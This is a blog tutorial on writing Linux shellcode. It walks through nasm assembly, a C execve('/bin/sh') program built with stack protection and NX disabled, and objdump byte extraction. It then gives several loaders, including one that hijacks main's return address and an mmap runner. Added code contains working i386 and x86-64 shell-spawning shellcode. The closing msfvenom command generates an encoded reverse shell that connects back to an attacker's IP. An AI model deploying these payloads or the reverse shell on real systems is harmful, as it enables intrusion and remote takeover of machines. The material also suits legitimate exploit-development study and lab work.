Linux Shellcode Development
ssooking

On a 64-bit system, install the 32-bit support libraries first:

sudo apt-get install lib32z1 lib32ncurses-dev

Linux system call numbers and argument registers can be looked up at http://syscalls.kernelgrok.com/.

Compiling Shellcode

Assembling the assembly source

nasm -f elf32 Asamblare.asm -o shellcode.o
ld -m elf_i386 -s -o T3jv1l shellcode.o
./T3jv1l

-f elf32 and -m elf_i386 produce a 32-bit object and binary; -s strips the symbol table, which keeps the later objdump listing down to your own code.

Compiling C code

Write a getshell program, shell.c, in C:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* declares execve() */
int main()
{
    /* argv and envp are left NULL: Linux accepts that and starts the shell with no arguments */
    execve("/bin/sh", 0, 0);
    return 0;
}

Compile it:

gcc -g -O0 -fno-stack-protector -z execstack -m32 shell.c -o shell

What the flags do:

  • -g: emit debug information so gdb can debug at source level
  • -m32: build a 32-bit program (required when compiling a 32-bit binary on an x64 machine)
  • -O0: no optimization, so the generated code follows the source closely
  • -fno-stack-protector: disable the stack canary check
  • -z execstack: mark the stack executable (turns NX off for this binary)

Disassembling the program

Use objdump to disassemble the shell binary and view its assembly:

objdump -d shell

To pull the raw bytes out as a shellcode string, the following one-liner works:

for i in `objdump -d shell | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\\x$i" ; done > shellcode.txt

It collects the bytes of every instruction objdump prints, so on a gcc-built binary the C runtime start-up code comes along too; run it on the nasm/ld binary from the previous section (whose .text is only your code) or restrict objdump with -j .text, and check the result for \x00 bytes before using it.

There is also a handy tool, Sh3llshock, that does the extraction.
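The shell one-liner above accepts any two-hex-character token, which is fine for a stripped nasm binary but fragile on a larger listing. The program below is an added example, not code from the original post or from Sh3llshock: it extracts the bytes by following objdump's own column layout (address, colon, tab, bytes, tab, mnemonic), handles the continuation lines objdump emits for instructions longer than seven bytes, and prints the result as a C string literal. The embedded listing is constructed to look like objdump -d output for a 24-byte i386 execve("/bin//sh") stub plus one long instruction; the file name objdump_bytes.c is an assumption.

```c
/* objdump_bytes.c: added example, not code from the original post.
 * Extracts opcode bytes from `objdump -d` output using objdump's column
 * layout (address ':' TAB bytes TAB mnemonic), so addresses, symbol headers
 * and mnemonics such as "add" are never taken for bytes. Continuation lines
 * (address ':' TAB bytes, no mnemonic) of long instructions are handled.
 * Build: gcc objdump_bytes.c -o objdump_bytes; objdump -d shell | ./objdump_bytes */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Constructed sample (not real tool output): an i386 execve("/bin//sh")
 * stub of 24 bytes, then one 10-byte instruction to exercise continuation. */
static const char SAMPLE[] =
    "shell:     file format elf32-i386\n"
    "\n"
    "Disassembly of section .text:\n"
    "\n"
    "08049000 <.text>:\n"
    " 8049000:\t31 c0                \txor    %eax,%eax\n"
    " 8049002:\t50                   \tpush   %eax\n"
    " 8049003:\t68 2f 2f 73 68       \tpush   $0x68732f2f\n"
    " 8049008:\t68 2f 62 69 6e       \tpush   $0x6e69622f\n"
    " 804900d:\t89 e3                \tmov    %esp,%ebx\n"
    " 804900f:\t50                   \tpush   %eax\n"
    " 8049010:\t53                   \tpush   %ebx\n"
    " 8049011:\t89 e1                \tmov    %esp,%ecx\n"
    " 8049013:\t99                   \tcltd\n"
    " 8049014:\tb0 0b                \tmov    $0xb,%al\n"
    " 8049016:\tcd 80                \tint    $0x80\n"
    " 8049018:\tc7 83 00 01 00 00 41 \tmovl   $0x44434241,0x100(%ebx)\n"
    " 804901f:\t42 43 44\n";

/* Two hex digits followed by a separator or end of line -> value, else -1. */
static int hexpair(const char *s)
{
    unsigned v;
    if (!isxdigit((unsigned char)s[0]) || !isxdigit((unsigned char)s[1]))
        return -1;
    if (s[2] != ' ' && s[2] != '\t' && s[2] != '\n' && s[2] != '\0')
        return -1;
    sscanf(s, "%2x", &v);
    return (int)v;
}

/* Append the opcode bytes of one listing line to out; returns how many. */
size_t bytes_from_line(const char *line, unsigned char *out, size_t cap)
{
    const char *p = line, *q;
    size_t n = 0;
    int b;

    while (*p == ' ') p++;
    for (q = p; isxdigit((unsigned char)*q); q++) ;
    if (q == p || *q != ':')          /* not "addr:": header, symbol or blank line */
        return 0;
    for (q++; *q == ' ' || *q == '\t'; q++) ;
    while (n < cap && (b = hexpair(q)) >= 0) {
        out[n++] = (unsigned char)b;
        q += 2;
        while (*q == ' ') q++;        /* padding before the mnemonic column */
        if (*q == '\t' || *q == '\n' || *q == '\0')
            break;                    /* mnemonic column reached, or end of line */
    }
    return n;
}

/* Walk a whole listing line by line; returns the number of bytes written. */
size_t extract_objdump_bytes(const char *text, unsigned char *out, size_t cap)
{
    size_t total = 0;
    const char *line = text, *nl;

    while (*line && total < cap) {
        total += bytes_from_line(line, out + total, cap - total);
        if (!(nl = strchr(line, '\n')))
            break;
        line = nl + 1;
    }
    return total;
}

/* Decode the sample once into a static buffer; returns its length. */
static size_t sample_decoded(const unsigned char **out)
{
    static unsigned char buf[256];
    static size_t n;
    if (!n) n = extract_objdump_bytes(SAMPLE, buf, sizeof buf);
    *out = buf;
    return n;
}
size_t sample_byte_count(void) { const unsigned char *b; return sample_decoded(&b); }
int sample_byte(size_t i) { const unsigned char *b; size_t n = sample_decoded(&b); return i < n ? b[i] : -1; }

int main(void)
{
    static char text[1 << 16];
    unsigned char sc[4096];
    size_t n, len;

    if (isatty(STDIN_FILENO)) {       /* nothing piped in: decode the sample */
        strcpy(text, SAMPLE);
    } else {
        n = fread(text, 1, sizeof text - 1, stdin);
        text[n] = '\0';
    }
    len = extract_objdump_bytes(text, sc, sizeof sc);
    printf("%zu bytes: \"", len);
    for (size_t i = 0; i < len; i++) printf("\\x%02x", sc[i]);
    printf("\"\n");
    return 0;
}
```

Run it with a real listing on stdin (objdump -d -j .text T3jv1l | ./objdump_bytes) or with no input to see the sample decoded; the two-byte check in hexpair is what keeps tokens such as "add" or "8049000:" out of the output.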

Testing the extracted shellcode with a small C loader:

#include <stdio.h>

/* write(1, "Ev1l h4ck T3jv1l 1337?", 22) followed by exit(1); the jmp/call/pop
 * sequence at the start finds the string's address without hard-coding it. */
char shellcode[] ="\xeb\x19\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x59\x31\xd2\xb2\x16\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80\xe8\xe2\xff\xff\xff\x45\x76\x31\x6c\x20\x68\x34\x63\x6b\x20\x54\x33\x6a\x76\x31\x6c\x20\x31\x33\x33\x37\x3f\x20";

int main(int argc, char **argv) {
    int *ret;
    /* Overwrite main's saved return address with the shellcode's address, so
     * returning from main jumps into it. This assumes ret sits directly below
     * the saved ebp (gcc -m32 -O0 -fno-stack-protector) and that the data
     * segment is executable (-z execstack), since the bytes live in .data. */
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}

Alternatively, run the shellcode from an anonymous RWX mapping instead of through the return address, which does not depend on -z execstack or on the frame layout:

#include <stdio.h>      /* printf, perror */
#include <sys/mman.h>   /* mmap, PROT_*, MAP_* */
#include <string.h>     /* memcpy, strlen */
#include <stdlib.h>     /* exit */
#include <unistd.h>     /* POSIX constants and types */

/* The shellcode under test is entered through this function pointer. */
int (*shellcodetotest)(void);
/* Placeholder bytes (truncated in the original); paste your own payload here. */
char shellcode[] = "\xeb\x35\x31\xc0\x31\xdb\x31\xcxxxxx";

int main(int argc, char **argv) {
    printf("Shellcode Length: %zu\n", strlen(shellcode));
    /* Anonymous, private mapping that is readable, writable and executable */
    void *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ,
                     MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
        perror("mmap");
        exit(-1);
    }
    memcpy(ptr, shellcode, sizeof(shellcode));  /* copy the payload into the mapping */
    shellcodetotest = (int (*)(void))ptr;       /* treat the mapping as code */
    shellcodetotest();                          /* jump to it */
    return 0;
}
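The getshell program and the mmap tester above share three weak points: nothing checks the payload for bytes that a strcpy- or gets-style delivery would truncate on, the page is mapped writable and executable at the same time, and if the payload works, the tester itself is replaced by /bin/sh, so it can never report what happened. The harness below is an added example, not code from the original post or from the nutcrackerssecurity write-ups it references: it carries hand-assembled execve("/bin//sh") stubs for both i386 (int 0x80) and x86-64 (syscall), scans them against a bad-byte list, copies them into a mapping that is only flipped to read-execute after the copy, and runs them in a forked child so the parent survives to print the exit status. The file name sc_runner.c and the bad-byte list are assumptions.

```c
/* sc_runner.c: added example, not code from the original post. Tester that
 * (1) counts bytes a string-based delivery would break on, (2) never maps a
 * page RWX (write, then flip to RX, so -z execstack is not needed) and
 * (3) runs the payload in a forked child so the harness survives to report.
 * Build with gcc -m32 to test the i386 stub, plain gcc for the x86-64 one. */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/wait.h>

/* execve("/bin//sh", {"/bin//sh", NULL}, NULL) via int 0x80; 24 bytes, no NUL. */
static const unsigned char SC_I386[] = {
    0x31, 0xc0,                   /* xor  eax, eax             */
    0x50,                         /* push eax   (terminator)   */
    0x68, 0x2f, 0x2f, 0x73, 0x68, /* push "//sh"               */
    0x68, 0x2f, 0x62, 0x69, 0x6e, /* push "/bin"               */
    0x89, 0xe3,                   /* mov  ebx, esp  (path)     */
    0x50, 0x53,                   /* push eax; push ebx        */
    0x89, 0xe1,                   /* mov  ecx, esp  (argv)     */
    0x99,                         /* cdq            (edx = 0)  */
    0xb0, 0x0b,                   /* mov  al, 11    (execve)   */
    0xcd, 0x80                    /* int  0x80                 */
};

/* The same call through the x86-64 syscall ABI; 28 bytes, no NUL. */
static const unsigned char SC_AMD64[] = {
    0x48, 0x31, 0xf6,             /* xor  rsi, rsi             */
    0x56,                         /* push rsi   (terminator)   */
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, /* movabs rdi, "/bin//sh" */
    0x57, 0x54, 0x5f,             /* push rdi; push rsp; pop rdi  (path) */
    0x56, 0x57,                   /* push rsi; push rdi        */
    0x48, 0x89, 0xe6,             /* mov  rsi, rsp  (argv)     */
    0x6a, 0x3b, 0x58,             /* push 59; pop rax (execve) */
    0x99,                         /* cdq            (rdx = 0)  */
    0x0f, 0x05                    /* syscall                   */
};

/* Number of payload bytes that appear in the bad set, e.g. "\x00" for strcpy. */
size_t count_bad(const unsigned char *sc, size_t len, const unsigned char *bad, size_t nbad)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (sc[i] == bad[j]) { hits++; break; }
    return hits;
}

/* The stub matching how this harness itself was compiled (-m32 or not). */
const unsigned char *payload_for_arch(size_t *len)
{
#if defined(__x86_64__)
    *len = sizeof SC_AMD64; return SC_AMD64;
#elif defined(__i386__)
    *len = sizeof SC_I386; return SC_I386;
#else
    *len = 0; return NULL;
#endif
}

/* Copy into a private RW mapping, then make it RX; NULL on failure. */
void *load_rx(const unsigned char *sc, size_t len)
{
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return NULL;
    memcpy(p, sc, len);
    if (mprotect(p, len, PROT_READ | PROT_EXEC) != 0) { munmap(p, len); return NULL; }
    return p;
}

/* Jump to entry in a child; returns the child's wait status, or -1 on error. */
int run_forked(void *entry)
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        ((void (*)(void))entry)();    /* only returns if the payload returns */
        _exit(127);
    }
    return waitpid(pid, &status, 0) < 0 ? -1 : status;
}

int main(void)
{
    size_t len, bad;
    const unsigned char *sc = payload_for_arch(&len);
    void *entry;
    int st;

    if (!sc) { fputs("unsupported architecture\n", stderr); return 1; }
    bad = count_bad(sc, len, (const unsigned char *)"\x00\x0a", 2);  /* NUL and LF */
    printf("Shellcode length: %zu, bad bytes: %zu\n", len, bad);
    if (bad) return 1;
    if (!(entry = load_rx(sc, len))) { perror("load_rx"); return 1; }
    if ((st = run_forked(entry)) < 0) { perror("run_forked"); return 1; }
    if (WIFEXITED(st)) printf("child exited with status %d\n", WEXITSTATUS(st));
    else printf("child killed by signal %d\n", WTERMSIG(st));
    return 0;
}
```

When the payload works, the child becomes /bin/sh attached to your terminal and the parent prints the shell's exit status once you leave it; a crash in the payload shows up as "killed by signal 11" instead of taking the harness down. Note that the i386 stub contains 0x0b (mov al, 11), so it passes a NUL-only filter but not one that also excludes 0x0b, which is the kind of constraint the msfvenom -b option below encodes around.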
Generating encoded shellcode with msfvenom (this example builds a Windows reverse shell with the x86/shikata_ga_nai encoder and \x00 excluded as a bad byte; for a Linux target use -p linux/x86/shell_reverse_tcp and --platform linux):

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=<attacker's IP address> LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f python

Reference

https://nutcrackerssecurity.github.io/Shellcode.html

https://nutcrackerssecurity.github.io/Shellcode1.html

  • Post title: Linux Shellcode Development
  • Post author:ssooking
  • Create time:2020-01-17 16:38:00
  • Post link:https://ssooking.github.io/2020/01/linux-shellcode开发/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.